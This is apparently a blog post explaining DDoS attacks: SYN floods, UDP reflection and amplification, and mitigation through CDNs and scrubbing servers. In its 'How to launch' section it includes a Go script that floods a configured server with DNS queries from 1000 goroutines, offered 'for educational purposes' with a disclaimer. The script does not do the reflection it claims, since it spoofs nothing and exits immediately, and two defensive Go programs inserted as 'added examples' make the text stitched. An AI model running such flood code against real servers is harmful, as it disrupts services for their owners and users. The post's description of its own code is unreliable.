QiYiming's Blog

a simple blog by QiYiming#6898

Popular Science: What is DDoS? What are the types of DDoS? How can I launch a DDoS attack? And how can I prevent it?

What is a DDoS attack

DDoS (Distributed Denial of Service) is the most common form of network attack on the Internet. Its purpose is to exhaust a server's resources by sending it a very large number of requests, so that legitimate requests go unanswered. When an attacker uses two or more computers (commonly called zombies) to send denial-of-service traffic to a server, it is called a distributed denial-of-service attack.

What types of DDoS attacks are there

To understand how DDoS attacks work, we first need to understand the OSI seven-layer model, which divides the data flow in a communication system into seven layers, from the highest layer, representing distributed application data, down to the physical transmission of data across the communication medium. Each intermediate layer provides functionality to the layer above it and relies on the layer below it for its own functionality. These categories of functionality are implemented in software through standard communication protocols.

The seven layers of the OSI model are

  1. Physical layer
    In simple terms, it converts (modulates) the bit stream handed down by the data link layer into a stable signal suitable for the medium in use and sends it.
  2. Data link layer
    Groups the incoming bits into bytes and then into frames, adding a frame header and frame trailer.
  3. Network layer
    Performs logical addressing and selects paths between different networks, adding a network header to each packet. The header contains network-level data such as the IP addresses.
  4. Transport layer
    Adds a transport header to the data to form segments. The transport header identifies the transport protocol in use, for example the Transmission Control Protocol (TCP).
  5. Session layer
    The session layer sets up, controls and maintains the communication session between two computers.
  6. Presentation layer
    The presentation layer converts the data into a format the recipient understands and that is suitable for transmission.
  7. Application layer
    The application layer is the interface through which applications communicate with each other, using protocols such as HTTPS, HTTP, SSH, POP3 and FTP.

Distributed denial of service attacks generally target the fourth and seventh layers, that is, the transport layer and the application layer.
The attack methods at the transport layer differ from those at the application layer. The transport layer has the TCP and UDP protocols.
As we all know, TCP requires a three-way handshake to establish a connection, as shown in the figure:

[figure: the TCP three-way handshake]

For simplicity, think of the user as Bob and the server as Alice; Bob is in room 114 and Alice is in room 514.
In the first handshake, Bob says "Hello Alice, I'm Bob, I'm in room 114." (Bob sends a SYN packet.)
Alice receives Bob's request and performs the second handshake.
In the second handshake, Alice says "Hello Bob! I'm in room 514." (Alice sends a SYN+ACK packet.)
In the third handshake, Bob says "Okay, let's start transmitting data." (Bob sends an ACK packet.)
Then Bob and Alice start transmitting data.

But in a real network, after Alice replies to Bob, Bob may for various reasons never receive the reply and therefore cannot answer Alice. When Alice does not hear back from Bob within a certain period, she resends the SYN+ACK packet to Bob, and in the meantime she keeps the half-open connection in memory while she waits. Attackers take advantage of this: they use many computers to send "Hello Alice, I'm xxx, I'm in room xxx." to the server over and over, and Alice consumes a great deal of resources replying to these SYN packets and holding the half-open connections, until she crashes from resource exhaustion. This is a SYN attack (a SYN flood).

So what is a UDP attack?
UDP also has many kinds of attacks, such as the common reflection attack.
Using Alice and Bob as examples again, but adding a third person, Beast, in room 191.
Bob sends "Hello Alice, I'm Beast, I'm in room 191." to Alice (an NTP request whose source address is forged to be Beast's).
Alice does not reply to Bob but to Beast: "Hello Beast, I'm in room 514." (NTP response)
Beast now receives a packet from Alice that he knows nothing about, so he can do nothing with it.
UDP also allows amplification attacks.
For example, when you search "DDOS" on Baidu, it returns several tens of KB of data; that response size divided by the size of the word you searched for is the amplification factor.
Bob sends "Hello Alice, I'm Beast, I'm in room 191, what does DDOS mean?" to Alice (NTP request)
Alice again replies not to Bob but to Beast: "Hello Beast, DDOS refers to a distributed denial of service attack..." (NTP response)
This time Beast receives a much larger packet, and when Bob uses many servers as reflectors and sends such requests many times, Beast collapses under the volume of data.
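As an added example, not code from the original post, the following Go program shows how a defender watching flow records at the network edge would spot the reflection and amplification pattern described above. It pairs UDP replies leaving a service port with the requests that should have preceded them, per (service, client) pair, and flags pairs where the service answered a client that never asked (Beast receiving replies for requests Bob forged) or where the reply is many times larger than the request (the amplification factor). The flow records, addresses, ports, the service-port list (DNS and NTP) and the threshold are all constructed assumptions for the example.

```go
package main

import (
	"fmt"
	"sort"
)

// FlowRecord is a constructed one-direction UDP flow summary, as a flow collector
// at the network edge might export it. All values in SampleFlows are made up.
type FlowRecord struct {
	Src     string
	SrcPort int
	Dst     string
	DstPort int
	Bytes   int
}

// Finding is one suspicious (reflector, victim) pair.
type Finding struct {
	Reflector, Victim string
	RequestBytes      int
	ResponseBytes     int
	Amplification     float64 // response bytes / request bytes; 0 when no request was seen
}

// servicePorts lists UDP services commonly abused as reflectors (assumption: DNS and NTP).
var servicePorts = map[int]bool{53: true, 123: true}

// SampleFlows returns constructed records: one normal DNS lookup, one NTP exchange with
// an oversized reply, and replies arriving at Beast (10.0.0.77) for requests it never sent.
func SampleFlows() []FlowRecord {
	return []FlowRecord{
		{"10.0.0.5", 40001, "192.0.2.53", 53, 40},      // Bob asks a DNS server
		{"192.0.2.53", 53, "10.0.0.5", 40001, 120},     // modest answer, ratio 3
		{"10.0.0.9", 40002, "192.0.2.123", 123, 50},    // small NTP request
		{"192.0.2.123", 123, "10.0.0.9", 40002, 4000},  // reply 80x larger
		{"198.51.100.7", 123, "10.0.0.77", 40003, 4500}, // Beast never asked
		{"198.51.100.7", 123, "10.0.0.77", 40003, 4500},
		{"198.51.100.8", 53, "10.0.0.77", 40003, 4500},
	}
}

// DetectReflection groups request and response bytes per (service, client) pair and
// flags pairs where the service answered a client that never asked (reflection), or
// where the reply is at least `threshold` times larger than the request (amplification).
func DetectReflection(flows []FlowRecord, threshold float64) []Finding {
	type pair struct{ service, client string }
	req := map[pair]int{}
	resp := map[pair]int{}
	for _, f := range flows {
		switch {
		case servicePorts[f.SrcPort]: // reply leaving a service port
			resp[pair{f.Src, f.Dst}] += f.Bytes
		case servicePorts[f.DstPort]: // request towards a service port
			req[pair{f.Dst, f.Src}] += f.Bytes
		}
	}
	var out []Finding
	for p, rb := range resp {
		qb := req[p]
		var ratio float64
		if qb > 0 {
			ratio = float64(rb) / float64(qb)
		}
		if qb == 0 || ratio >= threshold {
			out = append(out, Finding{p.service, p.client, qb, rb, ratio})
		}
	}
	// Largest reply volume first: that is the pair most likely hurting the victim.
	sort.Slice(out, func(i, j int) bool { return out[i].ResponseBytes > out[j].ResponseBytes })
	return out
}

func main() {
	for _, f := range DetectReflection(SampleFlows(), 10) {
		fmt.Printf("%s -> %s: req=%dB resp=%dB amplification=%.0fx\n",
			f.Reflector, f.Victim, f.RequestBytes, f.ResponseBytes, f.Amplification)
	}
}
```

Run on the sample, the normal DNS lookup is not reported, the NTP pair is reported with an amplification of 80, and the two servers replying to Beast are reported with an amplification of 0, meaning no request was ever seen from that client; at the victim's edge that absence of requests is the signature of a reflection attack.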

How to launch a DDoS attack?

Warning! Any DDoS attack is illegal. If you use the code from this blog to attack any server, this blog is not responsible for any consequences. The example code is for educational purposes only!
Here is an example code that uses the Chinese national firewall as a reflection source:

package main
// Import necessary dependencies
import (
	"fmt"
	"github.com/miekg/dns"
	"github.com/spf13/viper"
	"net"
)

const numGoroutines = 1000 // Set the number of goroutines to be used

func main() {
	// Read the configuration file
	viper.SetConfigName("config") // The configuration file name is config.yaml
	viper.AddConfigPath(".")      // Look for the configuration file in the current directory
	err := viper.ReadInConfig()   // Read the configuration file
	if err != nil {
		panic(err)
	}

	// Create a UDP connection
	conn, err := net.Dial("udp", fmt.Sprintf("%s:%d", viper.GetString("server.ip"), viper.GetInt("server.port")))
	if err != nil {
		panic(err)
	}
	defer conn.Close()

	// Create a DNS query message
	msg := &dns.Msg{}
	msg.SetQuestion("www.google.com.", dns.TypeA)
	msg.SetQuestion("www.google.com.", dns.TypeAAAA)

	// Create multiple goroutines
	for i := 0; i < numGoroutines; i++ {
		go func() {
			for {
				// Send DNS requests to the specified IP and port
				packed, err := msg.Pack()
				if err != nil {
					panic(err)
				}
				if _, err := conn.Write(packed); err != nil {
					panic(err)
				}
			}
		}()
	}
}

The above is a simple example of a DNS attack that uses the Chinese national firewall as a reflection source, using the Go programming language.

How to prevent DDoS attacks?

There is no way to prevent DDoS attacks outright; currently there are two main ways to mitigate them.

Use a CDN

This solution requires hiding your origin server's IP. Its advantages are that it is distributed and the principle is easy to understand: no matter how the attacker attacks, they can only hit your CDN and cannot reach your server.

Purchase high-defense servers

This solution does not require hiding your origin server's IP. Its advantage is that the defense capacity can be very large, and there is no CDN to maintain. The disadvantage is obvious: it is expensive, expensive, damn expensive. Why is it expensive? For example, a server advertised with 60Gbps of defense needs upstream bandwidth greater than 60Gbps, otherwise the link is saturated before the traffic can be cleaned. A high-defense setup consists of a cleaning server and your own server, connected over an internal network. The principle is also very simple.
Call the cleaning server Rick, your server Alice, and the client Bob.
When Bob sends a SYN to your server, the cleaning server receives it first and replies with its own SYN+ACK to check whether the sender is a SYN attacker. If Bob replies with an ACK, the cleaning server establishes a TCP connection to your server and starts forwarding Bob's data.
When Bob is an attacker, he continuously sends SYN packets to the cleaning server; the cleaning server replies with SYN+ACK, but since Bob is not a legitimate user but a SYN attacker, he never replies with an ACK, so the cleaning server never forwards the connection to your server.
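The half-open connection behaviour from the SYN attack section above and the cleaning-server logic just described, as an added Go example that is not part of the original post: a backend (Alice) with a bounded half-open table like a real listen backlog, a scrubber (Rick) that answers SYN+ACK itself and only performs a handshake with the backend after the client has returned its ACK, and a simulation that runs a flood of SYN-only peers followed by one legitimate client, once with the backend exposed directly and once behind the scrubber. The backlog size, peer names and the scrubber's in-memory pending table are assumptions; a real cleaning server would typically use SYN cookies rather than a per-peer map so that it holds no state per unanswered SYN.

```go
package main

import "fmt"

// Frontend is whatever first answers a client's SYN: the backend directly, or the scrubber.
type Frontend interface {
	Syn(peer string) bool
	Ack(peer string) bool
}

// Backend models the protected server (Alice). The half-open table is bounded,
// like a real listen backlog; the size is an assumption for this example.
type Backend struct {
	backlog     int
	halfOpen    map[string]bool
	Established []string
	Dropped     int // SYNs refused because the half-open table was full
}

func NewBackend(backlog int) *Backend {
	return &Backend{backlog: backlog, halfOpen: map[string]bool{}}
}

// Syn stores a half-open entry (the server has sent SYN+ACK and waits for the ACK).
// A repeated SYN from a known peer is treated as a retransmit.
func (b *Backend) Syn(peer string) bool {
	if b.halfOpen[peer] {
		return true
	}
	if len(b.halfOpen) >= b.backlog {
		b.Dropped++
		return false
	}
	b.halfOpen[peer] = true
	return true
}

// Ack completes the handshake; it fails if no half-open entry exists for the peer.
func (b *Backend) Ack(peer string) bool {
	if !b.halfOpen[peer] {
		return false
	}
	delete(b.halfOpen, peer)
	b.Established = append(b.Established, peer)
	return true
}

// HalfOpen reports how many handshakes are still waiting for an ACK.
func (b *Backend) HalfOpen() int { return len(b.halfOpen) }

// Scrubber models the cleaning server (Rick). It replies SYN+ACK on its own and
// only performs a handshake with the backend once the client has returned an ACK,
// so SYN-only attackers never consume backend state.
type Scrubber struct {
	pending map[string]bool // assumption: a real scrubber would use SYN cookies instead
	backend *Backend
}

func NewScrubber(b *Backend) *Scrubber {
	return &Scrubber{pending: map[string]bool{}, backend: b}
}

func (s *Scrubber) Syn(peer string) bool {
	s.pending[peer] = true // SYN+ACK sent to the client; nothing forwarded yet
	return true
}

func (s *Scrubber) Ack(peer string) bool {
	if !s.pending[peer] {
		return false
	}
	delete(s.pending, peer)
	// The client proved it can complete a handshake; now connect it to the backend.
	return s.backend.Syn(peer) && s.backend.Ack(peer)
}

// Simulate sends SYN-only traffic from `attackers` constructed peers, then one
// legitimate client ("bob") that completes its handshake. It reports whether bob
// connected and what the backend's tables looked like afterwards.
func Simulate(withScrubber bool, attackers, backlog int) (bobConnected bool, dropped, halfOpen int) {
	backend := NewBackend(backlog)
	var front Frontend = backend
	if withScrubber {
		front = NewScrubber(backend)
	}
	for i := 0; i < attackers; i++ {
		front.Syn(fmt.Sprintf("attacker-%d", i)) // never followed by an ACK
	}
	front.Syn("bob")
	bobConnected = front.Ack("bob")
	return bobConnected, backend.Dropped, backend.HalfOpen()
}

func main() {
	for _, scrub := range []bool{false, true} {
		ok, dropped, half := Simulate(scrub, 1000, 128)
		fmt.Printf("scrubber=%v bobConnected=%v backendDropped=%d backendHalfOpen=%d\n",
			scrub, ok, dropped, half)
	}
}
```

With 1000 SYN-only peers and a backlog of 128, the exposed backend fills its half-open table with the first 128 attackers, refuses the remaining 872 plus Bob's SYN, and Bob never connects. Behind the scrubber the backend sees no attacker traffic at all: its half-open table stays empty, nothing is dropped, and Bob's completed handshake is the only connection forwarded.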

Summary

Although DDoS attacks are illegal, they still exist. No matter how good your server is, how cleverly it is configured, and how powerful its defense is, there will always be someone more powerful who attacks your server, maliciously or otherwise. Liu Cixin wrote in "The Three-Body Problem": "No matter how fast you are, there is always someone faster than you; no matter how slow you are, there is always someone slower than you." This article is based on my previous experience of being attacked. If there are any omissions, you are welcome to discuss them in the comments; if there are any errors, please point them out.
